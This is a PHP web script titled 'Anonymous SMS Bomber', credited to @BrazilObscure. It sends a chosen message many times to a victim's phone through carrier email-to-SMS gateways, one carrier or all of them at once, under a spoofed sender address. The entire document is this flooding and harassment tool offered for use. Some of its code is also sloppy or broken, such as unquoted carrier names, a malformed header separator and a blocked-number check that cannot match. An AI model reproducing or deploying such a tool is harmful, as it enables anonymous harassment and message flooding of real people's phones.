SMS Bomber
Anonymous SMS Bomber
SMS Bomber @BrazilObscure
$Blocked_number = "5555555555";
if (!$_POST['send']) {
echo ("
");
} else {
if (isset($_POST['amount']) && (!is_numeric($_POST['amount']))){
echo "
Invalid Request.
";
exit;
}
if ($_POST['sub'] == " Subject" OR $_POST['mess'] == " Your Message" OR $_POST['from'] == " From" OR $_POST['amount'] == " Amount"){
echo "
Invalid Request.
";
exit;
}
if (!is_numeric($_POST['to1']) OR !is_numeric($_POST['to2']) OR !is_numeric($_POST['to3'])) {
echo "
Invalid Request.
";
exit;
}
if ("$to1$to2$to3" == '$Blocked_number') {
echo "
Invalid Request.
";
exit;
}
$to1 = stripslashes($_POST['to1']);
$to2 = stripslashes($_POST['to2']);
$to3 = stripslashes($_POST['to3']);
$sub = stripslashes($_POST['sub']);
$mess = nl2br(stripslashes($_POST['mess']));
$carrier = stripslashes($_POST['carrier']);
$from1 = stripslashes($_POST['from']);
$from = "$from1@mobile.com <$from1@mobile.com>";
$amount = stripslashes($_POST['amount']);
$headers = 'MIME-Version: 1.0' . ">br /<";
$headers .= 'Content-Type: text/html; charset="iso-8859-1" ' . ">br /<";
$headers .= 'Content-Transfer-Encoding: 8bit' . ">br /<";
$headers .= "from: ".$from;
if ($carrier == cingular) {
for ($i=1; $i<=$amount; $i++){
mail("$to1$to2$to3@cingularme.com", "$sub", $mess, $headers);
}
} elseif ($carrier == tmobile) {
for ($i=1; $i<=$amount; $i++){
mail("$to1$to2$to3@tmomail.net", "$sub", $mess, $headers);
}
}
if ($carrier == virgin-mobile) {
for ($i=1; $i<=$amount; $i++){
mail("$to1$to2$to3@vmobl.com", "$sub", $mess, $headers);
}
} elseif ($carrier == sprint) {
for ($i=1; $i<=$amount; $i++){
mail("$to1$to2$to3@messaging.sprintpcs.com", "$sub", $mess, $headers);
}
}
if ($carrier == verizon) {
for ($i=1; $i<=$amount; $i++){
mail("$to1$to2$to3@vtext.com", "$sub", $mess, $headers);
}
} elseif ($carrier == nextel) {
for ($i=1; $i<=$amount; $i++){
mail("$to1$to2$to3@messaging.nextel.com", "$sub", $mess, $headers);
}
}
if ($carrier == att) {
for ($i=1; $i<=$amount; $i++){
mail("$to1$to2$to3@mms.att.net", "$sub", $mess, $headers);
}
} elseif ($carrier == boost-mobile) {
for ($i=1; $i<=$amount; $i++){
mail("$to1$to2$to3@myboostmobile.com", "$sub", $mess, $headers);
}
}
if ($carrier == alltel) {
for ($i=1; $i<=$amount; $i++){
mail("$to1$to2$to3@message.alltel.com", "$sub", $mess, $headers);
}
} elseif ($carrier == optus) {
for ($i=1; $i<=$amount; $i++){
mail("$to1$to2$to3@optusmobile.com.au", "$sub", $mess, $headers);
}
}
if ($carrier == ALL) {
for ($i=1; $i<=$amount; $i++){
mail("$to1$to2$to3@cingularme.com", "$sub", $mess, $headers);
mail("$to1$to2$to3@tmomail.net", "$sub", $mess, $headers);
mail("$to1$to2$to3@vmobl.com", "$sub", $mess, $headers);
mail("$to1$to2$to3@messaging.sprintpcs.com", "$sub", $mess, $headers);
mail("$to1$to2$to3@vtext.com", "$sub", $mess, $headers);
mail("$to1$to2$to3@messaging.nextel.com", "$sub", $mess, $headers);
mail("$to1$to2$to3@mms.att.net", "$sub", $mess, $headers);
mail("$to1$to2$to3@myboostmobile.com", "$sub", $mess, $headers);
mail("$to1$to2$to3@message.alltel.com", "$sub", $mess, $headers);
mail("$to1$to2$to3@optusmobile.com.au", "$sub", $mess, $headers);
}
}
$mess_echo = str_ireplace("", "|", "$mess");
$to = "$to1-$to2-$to3";
echo ("
Your SMS has been sent ".$amount." times!
To:
".htmlentities($to)."
From:
".htmlentities($from1)."
Subject:
".htmlentities($sub)."
Message:
".htmlentities($mess_echo)."
");
}
?>